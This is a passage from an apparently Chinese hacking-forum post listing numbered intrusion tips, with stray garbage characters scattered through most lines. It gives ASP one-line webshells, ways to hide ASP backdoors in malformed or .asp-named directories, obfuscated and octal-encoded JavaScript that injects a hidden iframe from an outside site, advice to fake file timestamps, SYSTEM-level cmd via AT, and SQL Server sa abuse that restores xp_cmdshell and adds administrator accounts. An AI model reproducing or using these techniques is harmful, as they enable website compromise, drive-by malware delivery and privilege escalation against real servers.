d).<script language=VBScript runat=server>execute request("sb")</Script>* u) c* p( o+ O5 `/ o" l+ Y
e).<%25Execute(request("l"))%25>
9 {; z' m2 x, [' k; t9 af).<%if request("cmd")<>"" then execute request("pass")%>8 |- F  R7 Q  L( {( F
! S. j0 O- J/ d0 m1 _  F$ f
52、at "12:17" /interactive cmd
1 O' E* p3 t% K+ V( r" W/ Z8 c执行后可以用AT命令查看新加的任务
4 }, W/ v4 ]8 b8 S6 S7 p! l+ N0 f用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& _, R# Y( l' |9 U, f" W
. x2 k  i3 c' g0 e/ _3 Y9 q. k1 U53、隐藏ASP后门的两种方法
6 J1 k, E# A. i& H" f9 J' v1、建立非标准目录:mkdir images..\0 k& T" T) U7 Z
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
" h1 V5 @, H) W2 L' O3 ?通过web访问ASP木马:http://ip/images../news.asp?action=login  t" S/ r8 V, A! u! c' \' c
如何删除非标准目录:rmdir images..\ /s: F( A! Y; G& [9 Z; E" z
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
8 B0 U, `* F+ t1 a$ G  H; kmkdir programme.asp( ^( `- z6 G% N" E0 Q( |% o, e
新建1.txt文件内容:<!--#include file=”12.jpg”-->: L4 J7 Z. _* \" D: e& U
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ i( S  M( d# N6 y
attrib +H +S programme.asp
5 n! y) _. _3 P. W通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ z  d- R) B  u0 S. h
$ T$ m: A. M: l3 _$ `1 A9 j( S54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! Y" @9 k! l# X4 c# P
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。8 l( k' T; P, T

/ V7 H' t& f. D2 i' {7 D( U) v55、JS隐蔽挂马
9 _! \6 V8 n" Z1.0 z$ h" L7 Q; G8 }
var tr4c3="<iframe src=ht";
$ c; X8 x% m3 Q6 C4 I3 e. C" str4c3 = tr4c3+"tp:/";
# m* s, |9 S3 L. V. b6 ^; vtr4c3 = tr4c3+"/ww";
6 p- ^5 i3 X' o- rtr4c3 = tr4c3+"w.tr4";6 ~$ q, Z+ ?. X. @* U2 c; w
tr4c3 = tr4c3+"c3.com/inc/m";
" s* f: V7 ]% O. U+ b9 f6 wtr4c3 = tr4c3+"m.htm style="display:none"></i";5 B' ^9 X' D" K7 ~5 s+ m
tr4c3 =tr4c3+"frame>'";
9 P5 I0 E. [9 L/ x0 o# S9 _5 c2 Z. Gdocument.write(tr4c3);
4 O& k+ V: c4 Y  f- q) c避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 V  K" h6 \* h% Q5 p& {+ }1 Q7 n4 f3 H! S% z
2.
* Y) M1 N% R9 L( \# {% ?7 m转换进制,然后用EVAL执行。如' B: L+ U( K4 G8 l5 o7 y( J/ g
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");5 a: w8 A" ^7 Y$ b/ t. _2 g
不过这个有点显眼。
: M8 T" I: O- p" H. M# ?9 x# P! x3.+ z( f9 X- Q5 ]: l/ Y
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
& x! Z3 S; C, [* i! z& j$ x4 e最后一点,别忘了把文件的时间也修改下。- V( g$ Z% X) t6 {

$ E. \, w1 S$ }56.3389终端入侵常用DOS命令
3 e/ s; V7 N& ?9 {# X' ^/ b7 {taskkill taskkill /PID 1248 /t
$ _) z7 Q* J$ s4 b- X! o
( Z. C" q$ I$ H' o8 p/ }$ m. Btasklist 查进程9 B8 B1 {/ H* @6 [: f
$ B# ?& Y8 Z  u- b4 T; L# }/ u
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限3 Z% n1 e/ b) Z; b) a# Y
iisreset /reboot
  m, l& `) E" D/ w, p( d3 ^tsshutdn /reboot /delay:1    重起服务器
% K- O" l) ?/ U6 [" P, X% G* S" S9 h9 y) r- T
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
5 u$ g3 S7 `0 K. K7 Y8 z- n, E) ~2 D$ t1 T: u: P0 L" D' x- K
query user 查看当前终端用户在线情况
- Y' x4 v( X. W' O) a8 ?) K" Z* m$ T1 ~, M, q- ^
要显示有关所有会话使用的进程的信息,请键入:query process *
/ W" H! B, Z/ E$ H) V) F. R# V) A9 ^- j% t3 v
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
' r4 H3 P# s5 x& `1 \  `# Z
. J2 r/ R! P/ Y& T( N要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
: N6 U! G; z" |/ n* k% b7 ^0 a
2 n* i9 d: g8 h8 G7 T要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 w+ a5 z, S4 I% I8 j$ n
0 p  l8 s( F: k: G: H( n/ v命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启) R' \$ ?; f, h( L
. V) I7 n7 ^9 H7 q4 a& {
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) v+ ]; q1 U7 O1 q# D/ I7 Y4 l9 H% ]
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
8 Z3 j. v0 A2 J8 l9 x
$ Y/ w+ i0 T1 Y, L! x0 a命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
5 a5 ]6 ?+ Z# i5 J. i- E6 a
  o% C. N2 C' i( E- Q9 ?  k56、在地址栏或按Ctrl+O,输入:
! F; S( B/ S9 T- {5 ejavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
. B' D* }  o) n1 D0 n5 v4 [4 f3 G) Y5 O' G# z5 S
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。  e' v: M7 i6 y8 c! b; Y
+ v2 g0 @# Q: m* }/ Y" ~0 D
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
; F& ]7 {# [- g# D& z2 ~  r用net localgroup administrators是可以看到管理组下,加了$的用户的。
& o" Y! b: C0 P+ q) c5 H( T3 [* @# d
58、 sa弱口令相关命令& u8 \( H: [3 W. e2 h& L2 R
4 I( G+ y! o. @* g
一.更改sa口令方法:! H4 u% @2 {# Y2 B
用sql综合利用工具连接后,执行命令:5 O) U, d6 T5 Z- A7 ?
exec sp_password NULL,'20001001','sa'3 y# M5 P4 ?) S3 x
(提示:慎用!)
  E* M6 \# ]# E7 B( x1 v& `: N) {! D* b# T
二.简单修补sa弱口令.' }% Y7 Q: G, _1 J+ ^2 D! k
& p  v- S% E1 P1 m
方法1:查询分离器连接后执行:4 G0 o. n* }' A0 ^& A1 {: Z5 f
if exists (select * from
9 E/ v5 i1 q/ hdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" T: o% O! Y* g; j" q+ z6 KOBJECTPROPERTY(id, N'IsExtendedProc') = 1)  B7 V4 g& I3 ~' g* K  f6 {

* j+ b2 |% H* n) O. n+ A2 m( zexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
& ^0 s, z5 j% v
; A( @: J3 I0 Y! k6 ~6 E$ f( o$ aGO
2 Q$ s4 k; J$ P" A+ f& o8 E% d" [0 I3 t! N( |; U$ H# n' I
然后按F5键命令执行完毕+ F$ D) p9 Y# b" B/ J8 v1 m

; ?; }  }4 J. s( R+ y方法2:查询分离器连接后
3 f2 d. B+ U* M0 X, Z第一步执行:use master
5 g  [( j2 r! F( F. U第二步执行:sp_dropextendedproc 'xp_cmdshell'' L6 U- `7 K1 \9 D1 ^8 F. l
然后按F5键命令执行完毕/ ?8 L3 T& g7 P) u0 W

. _$ z  V2 P  L
/ A) D. b5 Q6 e# P! H) l三.常见情况恢复执行xp_cmdshell." P, t9 a3 x) O+ ?5 J9 I% o/ F* C) c7 e
4 S: c; x4 r- m' j' {5 ]

- j) \% j9 P" o1 未能找到存储过程'master..xpcmdshell'.+ O4 t7 Z) R8 T  \; K
   恢复方法:查询分离器连接后,0 \& x; Q  M& P" O
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
& l$ v) u+ o2 Q1 ~7 a/ h第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( c4 p/ o' ?1 S; N2 L: I+ r7 A然后按F5键命令执行完毕
& t3 [) a& l; w# t5 ]/ K! [
4 _9 k$ q1 a( F4 U3 u5 J8 k2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
# d) P# w. F4 t, h5 d) Q恢复方法:查询分离器连接后,
. U* J* r% n* Y5 v3 F% s第一步执行:sp_dropextendedproc "xp_cmdshell"* k9 s5 [0 U! c
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 o8 Y4 U, Y8 W* v9 E2 Z1 t( x% S2 ^然后按F5键命令执行完毕. w; s% s, S! |9 b) w  |0 L% I
8 s% j6 S. |# O6 _+ G, o1 o
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。); r- \3 y0 l& n+ n+ t4 z7 `
恢复方法:查询分离器连接后,
& ~( n  E# E: p' i: H& X第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
; y: H1 h9 m" b0 i1 U# u  W第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'             Q- K5 ?5 R" _5 @, G/ X
然后按F5键命令执行完毕
; z% g8 a% o$ Q6 N/ }& I8 g7 F( q) z9 ~
四.终极方法.# N4 r9 R6 \* J: I! G! U0 t
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:* W+ P+ v3 c. v# ]# L! t
查询分离器连接后," b. D& ~# e+ X
2000servser系统:/ C9 O4 e$ o0 ?4 ]9 h# K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
2 H- f2 f+ s8 D. P
0 q+ ~4 N' |( t% n5 Z# G8 u/ gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
$ w+ m% L' E1 }) v% G* `
9 f) K% ^, V6 r$ R; Jxp或2003server系统:
9 _' \6 p0 ?& w" y, v; S9 C' R; C7 r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* m) c9 K1 W7 n. s. E! z
% i* u  X- O  E* v+ \# I# ~! Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 R  t& Z3 X. O7 |; x7 Z4 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表